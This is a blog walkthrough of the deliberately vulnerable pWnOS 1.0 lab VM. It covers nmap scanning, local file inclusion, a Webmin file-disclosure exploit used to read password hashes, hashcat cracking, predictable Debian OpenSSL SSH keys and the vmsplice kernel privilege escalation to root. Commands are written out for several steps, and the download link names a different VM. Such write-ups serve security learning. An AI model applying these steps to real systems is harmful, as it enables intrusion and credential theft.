pWnOS 1.0 Boot2Root VM Walkthrough

Overview

PwnOS1.0 is boot2root deliberate vulnerable virtual machine designed by @Chronicoder for n00bs passionate about learning how system and application vulnerabilities lead to compromise. So, the goal is to root VM by exploiting found vulnerabilities and get the flag at /root/flag.txt. Reading /root/flag.txt is benchmark showing system is compromised successfully.

Download Link: https://www.vulnhub.com/entry/pwnlab-init,158/

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in bridge mode
  • pWnOS VM in bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • hashcat

Vulnerabilities Exploited:

  • Local File Inclusion
  • Webmin Arbitrary File Disclosure
  • Weak Passwords
  • OpenSSL Predictable PRNG (CVE-2008-0166)
  • Linux Kernel 2.6.17 < 2.6.24.1 – ‘vmsplice’ Local Privilege Escalation (2)

Reconnaissance

#netdiscover

image1

Target VM IP Address: 192.168.8.102

Scanning

nmap

nmap -p- -A -oX nmap-pwnOS.xml --webxml 192.168.8.102
image2

Nmap findings:

1- Target box is linux machine.

2- SSH server is enabled.

3- Apache server is listening on port 80.

4- webmin httpd version 0.01 is enabled on default port 10000

Exploit Path 1: Hacking website

Explore website in browser to find vulnerability for exploitation

image3

Found file inclusion vulnerability  in connect parameter of query string. LFI is exploitable.

image4

usernames found: root, vmware, obama, osama, yomama

unfortunately, /etc/shadow, /var/log/apache2/access.log files are not accessible through website. So, can not proceed further using this path. RFI is URL file-access is disabled in the server configuration

Lets explore webmin.

Exploit Path 2: Webmin exploit

With nmap, we knew version of webmin that seems old. Lets search and use exploit.

image5

We can Read arbitrary files with webmin exploit 2017.pl. More critical thing is, we can read any file with root privileges.

image6

crack linux passwords with hashcat

hashcat -m 500 -a 0 -o cracked.txt --force hash.txt /usr/share/wordlists/sqlmap.txt

image7

vmware passowrd is cracked.

ssh access is granted

image8

Epxloit Path 3: SSH autorized keys

Since, we already know usernames on server. Lets try to read ssh authorized keys for known users.

image9

since, authorized keys are accesible, lets try exploit

https://www.exploit-db.com/exploits/5720/

To use exploit, we must download database mentioned in exploit prior to execute exploit from this location and decompress.
#wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

#tar vxjf 5622.tar.bz1
search ssh authrozed keys through this database

image10

dcbe2a56e8cdea6d17495f6648329ee2-4679.pub

login with keys

ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.8.102

image11

Privilege Escalation

searchsploit linux vmsplice

We already have secure shell access for vmware and obama user accounts on target box. Lets upload exploit code 5092.c on server, compile and execute exploit.

image12

Congrats… ! We are root!

Conclusion

This was excellent boot2root VM. I learned a lot and thanks to @Chronicoder for putting effort designing such a great VM for students like me to learn and practice security concepts.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s